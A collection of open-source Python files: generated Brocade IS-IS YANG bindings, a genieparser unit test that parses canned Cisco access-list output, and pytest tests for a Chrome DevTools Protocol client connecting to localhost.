Setter method for ospf_level12, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_level12 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_level12 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_level12() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_level12 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)""",
})
self.__ospf_level12 = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_level12(self):
self.__ospf_level12 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ospf-level12", rest_name="level-1-2", parent=self, choice=(u'ch-ospf-levels', u'ca-ospf-level12'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IS-IS Level-1-2 routes', u'alt-name': u'level-1-2', u'cli-full-no': None}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='empty', is_config=True)
def _get_ospf_metric_type(self):
"""
Getter method for ospf_metric_type, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric_type (is-metric-type-t)
"""
return self.__ospf_metric_type
def _set_ospf_metric_type(self, v, load=False):
"""
Setter method for ospf_metric_type, mapped from YANG variable /routing_system/router/isis/router_isis_cmds_holder/address_family/ipv4/af_ipv4_unicast/af_ipv4_attributes/af_common_attributes/redistribute/ospf/ospf_metric_type (is-metric-type-t)
If this variable is read-only (config: false) in the
source YANG file, then _set_ospf_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ospf_metric_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ospf_metric_type must be of a type compatible with is-metric-type-t""",
'defined-type': "brocade-isis:is-metric-type-t",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)""",
})
self.__ospf_metric_type = t
if hasattr(self, '_set'):
self._set()
def _unset_ospf_metric_type(self):
self.__ospf_metric_type = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'internal': {'value': 1}, u'external': {'value': 2}},), default=unicode("internal"), is_leaf=True, yang_name="ospf-metric-type", rest_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IS-IS metric type for redistributed routes', u'alt-name': u'metric-type'}}, namespace='urn:brocade.com:mgmt:brocade-isis', defining_module='brocade-isis', yang_type='is-metric-type-t', is_config=True)
match = __builtin__.property(_get_match, _set_match)
ospf_metric = __builtin__.property(_get_ospf_metric, _set_ospf_metric)
ospf_route_map = __builtin__.property(_get_ospf_route_map, _set_ospf_route_map)
ospf_level1 = __builtin__.property(_get_ospf_level1, _set_ospf_level1)
ospf_level2 = __builtin__.property(_get_ospf_level2, _set_ospf_level2)
ospf_level12 = __builtin__.property(_get_ospf_level12, _set_ospf_level12)
ospf_metric_type = __builtin__.property(_get_ospf_metric_type, _set_ospf_metric_type)
__choices__ = {u'ch-ospf-levels': {u'ca-ospf-level2': [u'ospf_level2'], u'ca-ospf-level12': [u'ospf_level12'], u'ca-ospf-level1': [u'ospf_level1']}}
_pyangbind_elements = {'match': match, 'ospf_metric': ospf_metric, 'ospf_route_map': ospf_route_map, 'ospf_level1': ospf_level1, 'ospf_level2': ospf_level2, 'ospf_level12': ospf_level12, 'ospf_metric_type': ospf_metric_type, }
# Source: sygnal/datasets/__init__.py (i-machine-think/signal, MIT)
from .diagnostic_dataset import DiagnosticDataset
from .image_dataset import ImageDataset
from .message_dataset import MessageDataset
from .shapes_dataset import ShapesDataset
# Source: python/testData/completion/notImportedQualifiedName/ImportForModuleFunction/main.after.py (06needhamt/intellij-community, Apache-2.0)
import foo.bar
foo.bar.func()
#!/usr/bin/env python
# Source: src/genie/libs/parser/ios/tests/test_show_acl.py (nujo/genieparser, Apache-2.0)
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError, SchemaMissingKeyError
from genie.libs.parser.ios.show_acl import ShowAccessLists
from genie.libs.parser.iosxe.tests.test_show_acl import TestShowAccessLists as TestShowAccessListsIosxe
class TestShowAccessLists(TestShowAccessListsIosxe):
maxDiff = None
golden_output_standard = {'execute.return_value': '''\
Switch# show ip access-lists
Standard IP access list 1
permit 172.20.10.10
Standard IP access list 10
permit 10.66.12.12
Standard IP access list 12
deny 10.16.3.2
Standard IP access list 32
permit 172.20.20.20
Standard IP access list 34
permit 10.24.35.56
permit 10.34.56.34
'''}
golden_parsed_output_standard = {
'1': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'172.20.10.10 0.0.0.0': {
'source_network': '172.20.10.10 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '1',
'type': 'ipv4-acl-type'
},
'10': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.66.12.12 0.0.0.0': {
'source_network': '10.66.12.12 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '10',
'type': 'ipv4-acl-type'
},
'12': {
'aces': {
'10': {
'actions': {
'forwarding': 'deny'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.16.3.2 0.0.0.0': {
'source_network': '10.16.3.2 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '12',
'type': 'ipv4-acl-type'
},
'32': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'172.20.20.20 0.0.0.0': {
'source_network': '172.20.20.20 0.0.0.0'
}
}
}
}
},
'name': '10'
}
},
'name': '32',
'type': 'ipv4-acl-type'
},
'34': {
'aces': {
'10': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.24.35.56 0.0.0.0': {
'source_network': '10.24.35.56 0.0.0.0'
}
}
}
}
},
'name': '10'
},
'20': {
'actions': {
'forwarding': 'permit'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'10.34.56.34 0.0.0.0': {
'source_network': '10.34.56.34 0.0.0.0'
}
}
}
}
},
'name': '20'
}
},
'name': '34',
'type': 'ipv4-acl-type'
}
}
golden_output_ios = {'execute.return_value': '''\
Router# show access-lists 101
Extended IP access list 101
10 permit ip host 10.3.3.3 host 10.5.5.34
20 permit icmp any any
30 permit ip host 10.34.2.2 host 10.2.54.2
40 permit ip host 10.3.4.31 host 10.3.32.3 log
'''}
golden_parsed_output_ios = {
"101": {
"name": "101",
"type": "ipv4-acl-type",
"aces": {
"10": {
"name": "10",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.3.3.3": {
"source_network": "host 10.3.3.3"
}
},
"destination_network": {
"host 10.5.5.34": {
"destination_network": "host 10.5.5.34"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
},
"20": {
"name": "20",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "icmp",
"source_network": {
"any": {
"source_network": "any"
}
},
"destination_network": {
"any": {
"destination_network": "any"
}
}
}
},
"l4": {
"icmp": {
"established": False
}
}
}
},
"30": {
"name": "30",
"actions": {
"forwarding": "permit",
"logging": "log-none"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.34.2.2": {
"source_network": "host 10.34.2.2"
}
},
"destination_network": {
"host 10.2.54.2": {
"destination_network": "host 10.2.54.2"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
},
"40": {
"name": "40",
"actions": {
"forwarding": "permit",
"logging": "log-syslog"
},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"host 10.3.4.31": {
"source_network": "host 10.3.4.31"
}
},
"destination_network": {
"host 10.3.32.3": {
"destination_network": "host 10.3.32.3"
}
}
}
},
"l4": {
"ipv4": {
"established": False
}
}
}
}
}
}
}
golden_output_customer1 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any echo
20 permit icmp any any echo-reply (1195 matches)
30 permit icmp any any ttl-exceeded
40 permit icmp any any unreachable
50 permit icmp any any packet-too-big
60 deny icmp any any
80 permit udp any host 10.4.1.1 eq 1985
'''
}
golden_parsed_output_customer1 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo'
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 1195
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo-reply'
}
}
}
},
'30': {
'name': '30',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'ttl-exceeded'
}
}
}
},
'40': {
'name': '40',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'unreachable'
}
}
}
},
'50': {
'name': '50',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'packet-too-big'
}
}
}
},
'60': {
'name': '60',
'actions': {
'forwarding': 'deny',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'80': {
'name': '80',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
}
}
}
}
golden_output_customer2 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any
20 permit udp any host 10.4.1.1 eq 1985 (67 matches)
30 permit ip object-group dummydpd-local object-group dummydpd-remote
'''
}
golden_parsed_output_customer2 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 67
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
},
'30': {
'name': '30',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'object-group dummydpd-local': {
'source_network': 'object-group dummydpd-local'
}
},
'destination_network': {
'object-group dummydpd-remote': {
'destination_network': 'object-group dummydpd-remote'
}
}
}
},
'l4': {
'ipv4': {
'established': False
}
}
}
}
}
}
}
golden_output_customer3 = {'execute.return_value': '''
Extended IP access list acl1
10 permit icmp any any echo
20 permit icmp any any echo-reply (198 matches)
40 permit icmp any any unreachable
50 permit icmp any any packet-too-big
60 deny icmp any any
70 permit ip object-group grt-interface-nets object-group grt-interface-nets
80 permit udp any host 10.4.1.1 eq 1985
90 permit esp object-group vpn-endpoints-dummydpd host 10.4.1.1 (14 matches)
100 permit ahp object-group vpn-endpoints-dummydpd host 10.4.1.1
110 permit udp object-group vpn-endpoints-dummydpd host 10.4.1.1 eq isakmp (122 matches)
'''
}
golden_parsed_output_customer3 = {
'acl1': {
'name': 'acl1',
'type': 'ipv4-acl-type',
'aces': {
'10': {
'name': '10',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo'
}
}
}
},
'20': {
'name': '20',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 198
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'echo-reply'
}
}
}
},
'40': {
'name': '40',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'unreachable'
}
}
}
},
'50': {
'name': '50',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False,
'msg_type': 'packet-too-big'
}
}
}
},
'60': {
'name': '60',
'actions': {
'forwarding': 'deny',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'icmp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'any': {
'destination_network': 'any'
}
}
}
},
'l4': {
'icmp': {
'established': False
}
}
}
},
'70': {
'name': '70',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ipv4',
'source_network': {
'object-group grt-interface-nets': {
'source_network': 'object-group grt-interface-nets'
}
},
'destination_network': {
'object-group grt-interface-nets': {
'destination_network': 'object-group grt-interface-nets'
}
}
}
},
'l4': {
'ipv4': {
'established': False
}
}
}
},
'80': {
'name': '80',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'any': {
'source_network': 'any'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 1985
}
}
}
}
}
},
'90': {
'name': '90',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 14
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'esp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'esp': {
'established': False
}
}
}
},
'100': {
'name': '100',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'ahp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'ahp': {
'established': False
}
}
}
},
'110': {
'name': '110',
'actions': {
'forwarding': 'permit',
'logging': 'log-none'
},
'statistics': {
'matched_packets': 122
},
'matches': {
'l3': {
'ipv4': {
'protocol': 'udp',
'source_network': {
'object-group vpn-endpoints-dummydpd': {
'source_network': 'object-group vpn-endpoints-dummydpd'
}
},
'destination_network': {
'host 10.4.1.1': {
'destination_network': 'host 10.4.1.1'
}
}
}
},
'l4': {
'udp': {
'established': False,
'destination_port': {
'operator': {
'operator': 'eq',
'port': 500
}
}
}
}
}
}
}
}
}
def test_empty(self):
self.dev1 = Mock(**self.empty_output)
obj = ShowAccessLists(device=self.dev1)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden_standard(self):
self.dev1 = Mock(**self.golden_output_standard)
obj = ShowAccessLists(device=self.dev1)
parsed_output = obj.parse()
self.assertEqual(parsed_output,self.golden_parsed_output_standard)
def test_golden_ios(self):
self.dev1 = Mock(**self.golden_output_ios)
obj = ShowAccessLists(device=self.dev1)
parsed_output = obj.parse()
self.assertEqual(parsed_output,self.golden_parsed_output_ios)
def test_golden_customer1(self):
self.dev_c3850 = Mock(**self.golden_output_customer1)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer1)
def test_golden_customer2(self):
self.dev_c3850 = Mock(**self.golden_output_customer2)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer2)
def test_golden_customer3(self):
self.dev_c3850 = Mock(**self.golden_output_customer3)
obj = ShowAccessLists(device=self.dev_c3850)
parsed_output = obj.parse(acl='acl1')
self.assertEqual(parsed_output, self.golden_parsed_output_customer3)
if __name__ == '__main__':
unittest.main()
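The test classes above feed canned CLI output to the parser through a mocked device: `Mock(**self.golden_output_standard)` expands to `Mock(**{'execute.return_value': <canned text>})`, so every `device.execute(...)` call returns the stored string. A minimal self-contained sketch of that mocking pattern (the ACL text here is a shortened stand-in, not a full golden output):

```python
from unittest.mock import Mock

# Canned CLI output keyed exactly like the golden_output_* dicts above:
# the dotted key sets device.execute.return_value at construction time.
golden_output = {'execute.return_value': (
    'Standard IP access list 1\n'
    '    permit 172.20.10.10\n'
)}

device = Mock(**golden_output)

# Any arguments are accepted; the mock always returns the canned text.
out = device.execute('show ip access-lists')
assert 'permit 172.20.10.10' in out
```

The real tests then hand such a mock to the parser class (`ShowAccessLists(device=self.dev1)`), whose `parse()` invokes `device.execute(...)` under the hood and returns the structured dict compared against `golden_parsed_output_*`.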
# Source: tests/test_cdp.py (Phill240/chrome-remote-interface-py, Apache-2.0)
from typing import Dict, List, Callable, Any, Optional
import pytest
from aiohttp import ClientConnectorError
from cripy.cdp import CDP
from .helpers import (
Cleaner,
evaluation_result,
make_target_selector,
get_target_from_list,
)
TARGET_SELECTORS: List[Callable[[List[Dict[str, str]]], Any]] = [
make_target_selector("dict"),
make_target_selector("idx"),
make_target_selector("str"),
]
TARGET_SELECTORS_IDS: List[str] = [
"function returning target dict",
"function returning target index",
"function returning target ws url",
]
class TestCDPClientConnectionFailsNoChrome:
@pytest.mark.asyncio
async def test_cdp_client_fails_with_nothing_to_connect_to(self):
with pytest.raises(ClientConnectorError):
await CDP.client()
@pytest.mark.asyncio
async def test_cdp_client_fails_supplied_ws_url_bad(self):
with pytest.raises(Exception):
await CDP.client(target="ws://nope")
@pytest.mark.asyncio
async def test_cdp_ws_connection_fails_with_nothing_to_connect_to(self):
with pytest.raises(ClientConnectorError):
await CDP.ws_connection()
@pytest.mark.asyncio
async def test_cdp_ws_connection_fails_supplied_ws_url_bad(self):
with pytest.raises(Exception):
await CDP.ws_connection(target="ws://nope")
@pytest.mark.usefixtures("chrome")
class TestCDPClientCreation:
@pytest.mark.asyncio
async def test_cdp_client_connects_using_defaults(self, mr_clean: Cleaner):
client = await CDP.client()
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_defaults_remote(self, mr_clean: Cleaner):
client = await CDP.client(remote=True)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
client = await CDP.client(target=ws_url)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_relative_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
client = await CDP.client(target=ws_url[ws_url.index("/dev") :])
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_target_id(self, mr_clean: Cleaner):
target_id = await get_target_from_list("id")
assert target_id is not None
client = await CDP.client(target=target_id)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_target_dict(self, mr_clean: Cleaner):
the_target = await get_target_from_list("target")
assert the_target is not None
client = await CDP.client(target=the_target)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_http_url(
self, mr_clean: Cleaner
):
client = await CDP.client(target="http://localhost:9222")
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_http_url_remote(
self, mr_clean: Cleaner
):
client = await CDP.client(target="http://localhost:9222", remote=True)
mr_clean.add_disposable(client)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_remote_protocol_fetch(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
client = await CDP.client(target=fn, remote=True)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_pregen_protocol(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
client = await CDP.client(target=fn)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_client_connects_using_supplied_target_function_supplied_protocol(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
proto = await CDP.Protocol()
client = await CDP.client(target=fn, protocol=proto)
version = await client.Browser.getVersion()
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
client, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await client.dispose()
@pytest.mark.usefixtures("chrome")
class TestCDPWSConnectionCreation:
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_defaults(self, mr_clean: Cleaner):
connection = await CDP.ws_connection()
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_ws_url(self, mr_clean: Cleaner):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
connection = await CDP.ws_connection(target=ws_url)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_relative_ws_url(
self, mr_clean: Cleaner
):
ws_url = await get_target_from_list("wsurl")
assert ws_url is not None
connection = await CDP.ws_connection(target=ws_url[ws_url.index("/dev") :])
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_target_id(self, mr_clean: Cleaner):
target_id = await get_target_from_list("id")
assert target_id is not None
connection = await CDP.ws_connection(target=target_id)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_target_dict(
self, mr_clean: Cleaner
):
the_target = await get_target_from_list("target")
assert the_target is not None
connection = await CDP.ws_connection(target=the_target)
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_supplied_target_http_url(
self, mr_clean: Cleaner
):
connection = await CDP.ws_connection(target="http://localhost:9222")
mr_clean.add_disposable(connection)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
@pytest.mark.parametrize("fn", TARGET_SELECTORS, ids=TARGET_SELECTORS_IDS)
@pytest.mark.asyncio
async def test_cdp_ws_connection_connects_using_supplied_target_function(
self, fn: Callable[[List[Dict[str, str]]], Any]
):
connection = await CDP.ws_connection(target=fn)
version = await connection.send("Browser.getVersion")
assert version["product"] in version["userAgent"]
result_type, result = await evaluation_result(
connection, expression="window.location.href"
)
assert result_type == "string"
assert result == "about:blank"
await connection.dispose()
FRONT_END_URLS: List[Optional[str]] = [None, "http://localhost:9222"]
FRONT_END_URLS_IDS: List[str] = ["using defaults", "using supplied HTTP url"]
@pytest.mark.usefixtures("chrome")
class TestFontEndFns:
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_list_targets(self, frontend_url: Any):
if frontend_url is not None:
targets = await CDP.List(frontend_url=frontend_url)
else:
targets = await CDP.List()
page_listed = False
for target in targets:
if target["type"] == "page":
page_listed = True
break
assert page_listed
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_retrieve_version(self, frontend_url: Any):
if frontend_url is not None:
version = await CDP.Version(frontend_url=frontend_url)
else:
version = await CDP.Version()
assert version["Browser"] in version["User-Agent"]
@pytest.mark.parametrize("frontend_url", FRONT_END_URLS, ids=FRONT_END_URLS_IDS)
@pytest.mark.asyncio
async def test_can_retrieve_protocol_descriptor(self, frontend_url: Any):
if frontend_url is not None:
version = await CDP.Version(frontend_url=frontend_url)
proto_descriptor = await CDP.Protocol(frontend_url=frontend_url)
else:
version = await CDP.Version()
